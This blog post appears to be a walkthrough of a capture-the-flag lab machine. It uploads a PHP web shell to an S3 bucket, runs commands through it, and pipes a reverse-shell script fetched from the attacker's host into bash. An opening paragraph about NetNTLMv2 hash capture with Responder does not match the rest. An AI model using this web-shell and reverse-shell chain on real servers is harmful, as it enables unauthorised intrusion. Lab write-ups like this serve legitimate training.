HOME LAB : HANDS-ON
- Get link
- X
- Other Apps
- Get link
- X
- Other Apps
**********************************************************************************
By taking advantage of a File Inclusion vulnerability present on a webpage hosted on a Windows machine, an attacker can collect the NetNTLMv2 hash used for authentication services implemented through technologies such as (New Technology LAN Manager) and Kerberos. The attacker can then utilize a tool called "Responder" to capture the NetNTLMv2 hash, which can subsequently be subjected to brute-force attacks using "John the Ripper" in an attempt to match the original password used to create the hash.
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
upload: ./shell.php to s3://thetoppers.htb/shell.php
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try
executing the OS command id using the URL parameter cmd .
Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload
which will connect back to our local machine on port 1337 .
We will start a ncat listener on our local port 1337 using the following command.
nc -nvlp 1337
let's start a web server on our local machine on port 8000
python3 -m http.server 8000
We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash
in order to execute it. Thus, let us visit the following URL containing the payload in the browser.
http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash
The flag can be found at /var/www/flag.txt .
cat /var/www/flag.txt
Other way to get flag:
http://thetoppers.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls+
images index.php shell.php
http://thetoppers.htb/shell.php?cmd=ls+..
flag.txt html
http://thetoppers.htb/shell.php?cmd=cat+../flag.txt
Comments
Post a Comment